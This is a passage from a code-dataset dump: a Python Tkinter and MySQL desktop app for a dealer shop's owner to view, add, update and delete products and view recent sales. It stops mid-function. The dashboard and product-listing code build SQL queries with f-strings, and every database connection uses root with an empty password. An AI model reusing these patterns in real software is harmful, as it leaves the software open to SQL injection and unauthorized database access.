2019-11-13T05:04:38.000Z
|
2022-03-31T10:20:26.000Z
|
from . import batch
from . import conversions
from . import gcn
from . import mesh
from . import random
from . import reduction
from . import spc
from . import voxelgrid
| 18.888889
| 25
| 0.764706
| 24
| 170
| 5.416667
| 0.416667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188235
| 170
| 8
| 26
| 21.25
| 0.942029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0294deb3f1c9ef598b1a71203e52e7dfa5370845
| 119,350
|
py
|
Python
|
Easy_Dealer_Owner.py
|
Apex-Predator-s/Apex_Predator-s_Repository
|
4f8016b56f7bfeb338233d6b882336c451cb9d0c
|
[
"MIT"
] | null | null | null |
Easy_Dealer_Owner.py
|
Apex-Predator-s/Apex_Predator-s_Repository
|
4f8016b56f7bfeb338233d6b882336c451cb9d0c
|
[
"MIT"
] | null | null | null |
Easy_Dealer_Owner.py
|
Apex-Predator-s/Apex_Predator-s_Repository
|
4f8016b56f7bfeb338233d6b882336c451cb9d0c
|
[
"MIT"
] | null | null | null |
from tkinter import*
from tkinter import ttk
from PIL import ImageTk, Image
from ttkthemes import themed_tk as tk
from PyQt5 import QtWidgets
import os
import mysql.connector
from tkinter import messagebox
import Login_Page
directory_path = os.path.dirname(__file__)
class Owner:
def __init__(self, root, username):
self.root = root
self.username = username
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
start_width = int((screen_width - 1280) / 2)
start_height = int((screen_height - 720) / 2)
self.root.title('Easy Dealer')
self.root.iconbitmap(directory_path + '/images/logo.ico')
self.root.geometry(f'1280x720+{start_width}+{start_height - 30}')
self.root.resizable(False, False)
self.root.config(bg='#1F2026')
def bound_to_mousewheel(event):
showall_canvas.bind_all("<MouseWheel>", on_mousewheel)
def unbound_to_mousewheel(event):
showall_canvas.unbind_all("<MouseWheel>")
def on_mousewheel(event):
showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")
def dashboard_button_clicked():
self.dashboard_button.config(bg='#3C3F4A')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT Full_Name FROM user_table WHERE UserName = "{self.username}"'
my_cursor.execute(query)
fullname = my_cursor.fetchone()[0]
except Exception as e:
print(e)
dashboard_bg_label = Label(self.content_frame, image=self.dashboard_bg_image)
dashboard_bg_label.place(x=-2, y=-2)
welcome_label = Label(self.content_frame, text='WELCOME,', font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='white')
welcome_label.place(x=21, y=14)
name_label = Label(self.content_frame, text=fullname, anchor='w', width=25, font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='#BBBBBB')
name_label.place(x=118, y=14)
recent_sells_label = Label(self.content_frame, text='Recent sells,', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
recent_sells_label.place(x=21, y=65)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM sell ORDER BY Sell_ID DESC LIMIT 3'
my_cursor.execute(query)
sell_details = my_cursor.fetchall()
# sell_details = []
if len(sell_details) >= 1:
customer_id = sell_details[0][1]
product_name = sell_details[0][5]
selling_price = sell_details[0][3]
date_of_sell = sell_details[0][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=45, y=309)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=45, y=334)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=45, y=359)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=45, y=384)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=90, y=340)
if len(sell_details) >= 2:
customer_id = sell_details[1][1]
product_name = sell_details[1][5]
selling_price = sell_details[1][3]
date_of_sell = sell_details[1][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=179)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=204)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=229)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=254)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=210)
if len(sell_details) >= 3:
customer_id = sell_details[2][1]
product_name = sell_details[2][5]
selling_price = sell_details[2][3]
date_of_sell = sell_details[2][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=440)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=465)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=490)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=515)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=470)
except Exception as e:
print(e)
def show_products_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#3C3F4A')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
for widget in self.content_frame.winfo_children():
widget.destroy()
def bound_to_mousewheel(event):
showall_canvas.bind_all("<MouseWheel>", on_mousewheel)
def unbound_to_mousewheel(event):
showall_canvas.unbind_all("<MouseWheel>")
def on_mousewheel(event):
showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")
temp_frame = Frame(self.content_frame, width=960, height=514, bg='#292B37', border=None)
temp_frame.place(x=2, y=115)
showall_canvas = Canvas(temp_frame, width=960, height=514, bg='#292B37')
vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
vertical_bar.pack(side=RIGHT, fill='y')
showall_canvas.config(yscrollcommand=vertical_bar.set)
final_frame = Frame(temp_frame, width=960, height=514, bg='#292B37')
showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
final_frame.bind('<Enter>', bound_to_mousewheel)
final_frame.bind('<Leave>', unbound_to_mousewheel)
border_hide_frame1 = Frame(self.content_frame, bg='#292B37', height=7, width=958)
border_hide_frame1.place(x=6, y=111)
border_hide_frame2 = Frame(self.content_frame, bg='#292B37', height=638, width=7)
border_hide_frame2.place(x=-1, y=111)
border_hide_frame3 = Frame(self.content_frame, bg='#292B37', height=519, width=7)
border_hide_frame3.place(x=959, y=112)
showall_canvas.config(yscrollcommand=vertical_bar.set)
showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
show_product_bg_frame = Frame(self.content_frame, bg='#292B37', height=107, width=958)
show_product_bg_frame.place(x=2, y=9)
show_employees_bg_label = Label(show_product_bg_frame, image=self.show_employees_bg_image, bg='#292B37')
show_employees_bg_label.place(x=-2, y=-2)
show_product_label = Label(show_product_bg_frame, text='SHOW PRODUCT INFORMATION', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
show_product_label.place(x=50, y=40)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM product;'
my_cursor.execute(query)
products = my_cursor.fetchall()
for i in range(len(products)):
employee_frame = Frame(final_frame, bg='#292B37', height=340, width=958)
employee_frame_bg_label = Label(employee_frame, image=self.show_employee_bg_image, bg='#292B37')
employee_frame_bg_label.place(x=-2, y=-2)
product_name_label = Label(employee_frame, text=products[i][1], font=('Arial Rounded MT', 17, 'bold'), bg='#292B37', fg='white')
product_name_label.place(x=90, y=68)
product_price_label = Label(employee_frame, text='$ ' + str(products[i][3]), font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='white')
product_price_label.place(x=90, y=101)
product_id_label = Label(employee_frame, text=f'Product ID : {products[i][0]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_id_label.place(x=90, y=153)
product_category_label = Label(employee_frame, text=f'Category : {products[i][2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
product_category_label.place(x=90, y=201)
dop_label = Label(employee_frame, text=f'Date of purchase : {products[i][4]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dop_label.place(x=90, y=249)
employee_frame.pack()
except Exception as e:
print(e)
def add_products_button_clicked():
    """Switch the content area to the 'Add Product' form.

    Highlights the Add Products navigation button, clears the content
    frame and rebuilds the entry form.  The nested ``add`` callback
    validates the five fields and inserts the product row into MySQL.
    Closure over ``self`` (the enclosing page object).
    """
    # Highlight this section's nav button; reset every other one.
    self.dashboard_button.config(bg='#292B37')
    self.show_products_button.config(bg='#292B37')
    self.add_products_button.config(bg='#3C3F4A')
    self.update_products_button.config(bg='#292B37')
    self.delete_products_button.config(bg='#292B37')
    self.sales_button.config(bg='#292B37')
    self.selling_history_button.config(bg='#292B37')
    self.show_employees_button.config(bg='#292B37')
    self.add_employees_button.config(bg='#292B37')
    self.update_employees_button.config(bg='#292B37')
    self.delete_employees_button.config(bg='#292B37')

    def add():
        """Validate the form and INSERT the new product row."""
        def disappear_alert_label():
            # Best effort: the label may already have been destroyed by
            # navigating away before the 1.5 s timer fires.
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass

        product_name = product_name_edit.get()
        product_id = product_id_edit.get()
        purchase_price = purchase_price_edit.get()
        product_category = product_category_edit.get()
        dop = dop_edit.get()
        if product_name == '' or product_id == '' or purchase_price == '' or product_category == '' or dop == '':
            alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
        else:
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized query: the previous f-string version was
                # open to SQL injection through the form fields.
                query = 'INSERT INTO Product VALUES (%s, %s, %s, %s, %s);'
                my_cursor.execute(query, (product_id, product_name, product_category,
                                          purchase_price, dop))
                db.commit()
                db.close()
                alert_label.config(text='Product has been added successfully..', bg='#2FA422', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
                product_name_edit.delete(0, 'end')
                product_id_edit.delete(0, 'end')
                purchase_price_edit.delete(0, 'end')
                product_category_edit.delete(0, 'end')
                dop_edit.delete(0, 'end')
            except Exception:
                # Bad price value, duplicate key, or DB unavailable.
                alert_label.config(text='Sorry! Invalid input..', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

    # Rebuild the content area from scratch.
    for widget in self.content_frame.winfo_children():
        widget.destroy()
    self.add_products_bg_label = Label(self.content_frame, image=self.add_products_bg_image)
    self.add_products_bg_label.place(x=-2, y=-2)
    add_product_label = Label(self.content_frame, text='ADD PRODUCT', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    add_product_label.place(x=50, y=50)
    product_name_label = Label(self.content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    product_name_label.place(x=106, y=184)
    product_id_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    product_id_label.place(x=106, y=240)
    purchase_price_label = Label(self.content_frame, text='Purchase Price', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    purchase_price_label.place(x=106, y=307)
    product_category_label = Label(self.content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    product_category_label.place(x=106, y=369)
    dop_label = Label(self.content_frame, text='Date Of Purchase', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    dop_label.place(x=106, y=432)
    # NOTE(review): Entry has no 'text' option; Tk presumably treats it as an
    # abbreviation of '-textvariable', so same-named entries may share content
    # across pages — the delete() calls below clear any carried-over value.
    # Confirm before removing either.
    product_name_edit = Entry(self.content_frame, text='Product Name', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    product_name_edit.place(x=281, y=184)
    product_id_edit = Entry(self.content_frame, text='Product ID', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    product_id_edit.place(x=281, y=245)
    purchase_price_edit = Entry(self.content_frame, text='Purchase Price', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    purchase_price_edit.place(x=281, y=307)
    product_category_edit = Entry(self.content_frame, text='Product Category', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    product_category_edit.place(x=281, y=369)
    dop_edit = Entry(self.content_frame, text='Date Of Purchase', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    dop_edit.place(x=281, y=432)
    add_product_button = Button(self.content_frame, cursor='hand2', image=self.add_products_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=add)
    add_product_button.place(x=722, y=523)
    # Alert label starts invisible (fg == bg); callbacks recolor it.
    alert_label = Label(self.content_frame, width=30, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=106, y=523)
    product_name_edit.delete(0, 'end')
    product_id_edit.delete(0, 'end')
    purchase_price_edit.delete(0, 'end')
    product_category_edit.delete(0, 'end')
    dop_edit.delete(0, 'end')
def update_products_button_clicked():
    """Switch the content area to the 'Update Product' page.

    Offers a product-ID search box; a successful search (nested
    ``search``) builds an edit form pre-filled from the database, and
    its Update button (nested ``update``) persists the changes.
    Closure over ``self`` (the enclosing page object).
    """
    # Highlight this section's nav button; reset every other one.
    self.dashboard_button.config(bg='#292B37')
    self.show_products_button.config(bg='#292B37')
    self.add_products_button.config(bg='#292B37')
    self.update_products_button.config(bg='#3C3F4A')
    self.delete_products_button.config(bg='#292B37')
    self.sales_button.config(bg='#292B37')
    self.selling_history_button.config(bg='#292B37')
    self.show_employees_button.config(bg='#292B37')
    self.add_employees_button.config(bg='#292B37')
    self.update_employees_button.config(bg='#292B37')
    self.delete_employees_button.config(bg='#292B37')

    def search():
        """Look up the typed product ID and build the edit form."""
        def disappear_alert_label():
            # Best effort: the label may already have been destroyed.
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass

        def update():
            """Validate the edit form and persist the changes."""
            product_name = product_name_edit.get()
            product_id = product_id_edit.get()
            purchase_price = purchase_price_edit.get()
            product_category = product_category_edit.get()
            dop = dop_edit.get()
            if searched_product_id != product_id:
                # Product_ID is the lookup key; editing it here is rejected.
                alert_label.config(text='Oops! Invalid input..', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
            elif product_name == '' or product_id == '' or purchase_price == '' or product_category == '' or dop == '':
                alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
            else:
                try:
                    db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                    my_cursor = db.cursor()
                    # Parameterized query: the previous f-string version
                    # was open to SQL injection through the form fields.
                    query = ('UPDATE product SET Product_Name = %s, Product_Category = %s, '
                             'Price = %s, DOP = %s WHERE Product_ID = %s;')
                    my_cursor.execute(query, (product_name, product_category,
                                              float(purchase_price), dop, searched_product_id))
                    db.commit()
                    db.close()
                    for widget in self.update_content_frame.winfo_children():
                        widget.destroy()
                    search_edit.delete(0, 'end')
                    alert_label.config(text='Successfully updated the product', bg='#2FA422', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)
                except Exception:
                    alert_label.config(text='Sorry! Unable to update', bg='#AA2F2F', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)

        searched_product_id = search_edit.get()
        if searched_product_id == '':
            alert_label.config(text='Enter a product ID', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
        else:
            for widget in self.update_content_frame.winfo_children():
                widget.destroy()
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized lookup (was an injectable f-string).
                my_cursor.execute('SELECT * FROM product WHERE Product_ID = %s', (searched_product_id,))
                product = my_cursor.fetchall()
                db.close()  # fix: the connection was previously left open
                if len(product) == 0:
                    alert_label.config(text='Product doesn\'t exists', bg='#AA2F2F', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)
                else:
                    product_id = product[0][0]
                    product_name = product[0][1]
                    product_category = product[0][2]
                    purchase_price = product[0][3]
                    dop = product[0][4]
                    update_product_content_label = Label(self.update_content_frame, image=self.update_content_image, bd=0)
                    update_product_content_label.place(x=230, y=24)
                    product_name_label = Label(self.update_content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    product_name_label.place(x=106, y=46)
                    product_id_label = Label(self.update_content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    product_id_label.place(x=106, y=111)
                    purchase_price_label = Label(self.update_content_frame, text='Purchase Price', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    purchase_price_label.place(x=106, y=177)
                    product_category_label = Label(self.update_content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    product_category_label.place(x=106, y=243)
                    dop_label = Label(self.update_content_frame, text='Date Of Purchase', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    dop_label.place(x=106, y=309)
                    product_name_edit = Entry(self.update_content_frame, text='Product Name', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
                    product_name_edit.place(x=281, y=46)
                    product_id_edit = Entry(self.update_content_frame, text='Product ID', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
                    product_id_edit.place(x=281, y=111)
                    purchase_price_edit = Entry(self.update_content_frame, text='Purchase Price', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
                    purchase_price_edit.place(x=281, y=177)
                    product_category_edit = Entry(self.update_content_frame, text='Product Category', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
                    product_category_edit.place(x=281, y=243)
                    dop_edit = Entry(self.update_content_frame, text='Date Of Purchase', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
                    dop_edit.place(x=281, y=309)
                    # Clear any value carried over via shared Entry variables,
                    # then pre-fill with the current database row.
                    product_name_edit.delete(0, 'end')
                    product_id_edit.delete(0, 'end')
                    purchase_price_edit.delete(0, 'end')
                    product_category_edit.delete(0, 'end')
                    dop_edit.delete(0, 'end')
                    product_name_edit.insert(0, product_name)
                    product_id_edit.insert(0, product_id)
                    purchase_price_edit.insert(0, purchase_price)
                    product_category_edit.insert(0, product_category)
                    dop_edit.insert(0, dop)
                    update_button = Button(self.update_content_frame, cursor='hand2', image=self.update_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=update)
                    update_button.place(x=723, y=370)
            except Exception:
                alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

    # Rebuild the content area from scratch.
    for widget in self.content_frame.winfo_children():
        widget.destroy()
    self.update_products_bg_label = Label(self.content_frame, image=self.update_product_bg_image)
    self.update_products_bg_label.place(x=-2, y=-2)
    update_product_label = Label(self.content_frame, text='UPDATE PRODUCT', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    update_product_label.place(x=50, y=50)
    product_id_search_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    product_id_search_label.place(x=160, y=116)
    search_edit = Entry(self.content_frame, width=60, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    search_edit.place(x=270, y=116)
    search_edit.delete(0, 'end')
    search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
    search_button.place(x=776, y=105)
    self.update_content_frame = Frame(self.content_frame, width=980, height=470, bg='#292B37')
    self.update_content_frame.place(x=0, y=161)
    # Alert label starts invisible (fg == bg); callbacks recolor it.
    alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=90, y=530)
def delete_products_button_clicked():
    """Switch the content area to the 'Delete Product' page.

    Offers a product-ID search box; a successful search (nested
    ``search``) shows the product read-only, and the Delete button
    (nested ``delete``) removes the row after user confirmation.
    Closure over ``self`` (the enclosing page object).
    """
    # Highlight this section's nav button; reset every other one.
    self.dashboard_button.config(bg='#292B37')
    self.show_products_button.config(bg='#292B37')
    self.add_products_button.config(bg='#292B37')
    self.update_products_button.config(bg='#292B37')
    self.delete_products_button.config(bg='#3C3F4A')
    self.sales_button.config(bg='#292B37')
    self.selling_history_button.config(bg='#292B37')
    self.show_employees_button.config(bg='#292B37')
    self.add_employees_button.config(bg='#292B37')
    self.update_employees_button.config(bg='#292B37')
    self.delete_employees_button.config(bg='#292B37')

    def search():
        """Look up the typed product ID and show it for deletion."""
        def disappear_alert_label():
            # Best effort: the label may already have been destroyed.
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass

        def delete():
            """Delete the searched product after an OK/Cancel prompt."""
            user_response = messagebox.askokcancel('Confirm Deletion', 'Do you want to delete the product ?')
            if user_response:
                try:
                    db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                    my_cursor = db.cursor()
                    # Parameterized query: the previous f-string version
                    # was open to SQL injection through the search box.
                    my_cursor.execute('DELETE FROM product WHERE Product_ID = %s;', (searched_product_id,))
                    db.commit()
                    db.close()
                    for widget in self.delete_content_frame.winfo_children():
                        widget.destroy()
                    search_edit.delete(0, 'end')
                    alert_label.config(text='Successfully deleted the product', bg='#2FA422', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)
                except Exception:
                    alert_label.config(text='Sorry! Unable to delete', bg='#AA2F2F', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)

        searched_product_id = search_edit.get()
        if searched_product_id == '':
            alert_label.config(text='Enter a product ID', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
        else:
            for widget in self.delete_content_frame.winfo_children():
                widget.destroy()
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized lookup (was an injectable f-string).
                my_cursor.execute('SELECT * FROM product WHERE Product_ID = %s', (searched_product_id,))
                product = my_cursor.fetchall()
                db.close()  # fix: the connection was previously left open
                if len(product) == 0:
                    alert_label.config(text='Product doesn\'t exists', bg='#AA2F2F', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)
                else:
                    product_id = product[0][0]
                    product_name = product[0][1]
                    product_category = product[0][2]
                    purchase_price = product[0][3]
                    dop = product[0][4]
                    product_name_label = Label(self.delete_content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    product_name_label.place(x=106, y=46)
                    product_id_label = Label(self.delete_content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    product_id_label.place(x=106, y=111)
                    purchase_price_label = Label(self.delete_content_frame, text='Purchase Price', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    purchase_price_label.place(x=106, y=177)
                    product_category_label = Label(self.delete_content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    product_category_label.place(x=106, y=243)
                    dop_label = Label(self.delete_content_frame, text='Date Of Purchase', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
                    dop_label.place(x=106, y=309)
                    # Read-only value labels (deletion page shows, never edits).
                    product_name_label1 = Label(self.delete_content_frame, text=f'{product_name}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
                    product_name_label1.place(x=281, y=46)
                    product_id_label1 = Label(self.delete_content_frame, text=f'{product_id}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
                    product_id_label1.place(x=281, y=111)
                    purchase_price_label1 = Label(self.delete_content_frame, text=f'{purchase_price}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
                    purchase_price_label1.place(x=281, y=177)
                    product_category_label1 = Label(self.delete_content_frame, text=f'{product_category}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
                    product_category_label1.place(x=281, y=243)
                    dop_label1 = Label(self.delete_content_frame, text=f'{dop}', anchor='w', width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', borderwidth=0, fg='white')
                    dop_label1.place(x=281, y=309)
                    delete_button = Button(self.delete_content_frame, cursor='hand2', image=self.delete_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=delete)
                    delete_button.place(x=723, y=370)
            except Exception:
                alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

    # Rebuild the content area from scratch.
    for widget in self.content_frame.winfo_children():
        widget.destroy()
    self.delete_products_bg_label = Label(self.content_frame, image=self.update_product_bg_image)
    self.delete_products_bg_label.place(x=-2, y=-2)
    delete_product_label = Label(self.content_frame, text='DELETE PRODUCT', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    delete_product_label.place(x=50, y=50)
    product_id_search_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    product_id_search_label.place(x=160, y=116)
    search_edit = Entry(self.content_frame, width=60, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    search_edit.place(x=270, y=116)
    search_edit.delete(0, 'end')
    search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
    search_button.place(x=776, y=105)
    self.delete_content_frame = Frame(self.content_frame, width=980, height=470, bg='#292B37')
    self.delete_content_frame.place(x=0, y=161)
    # Alert label starts invisible (fg == bg); callbacks recolor it.
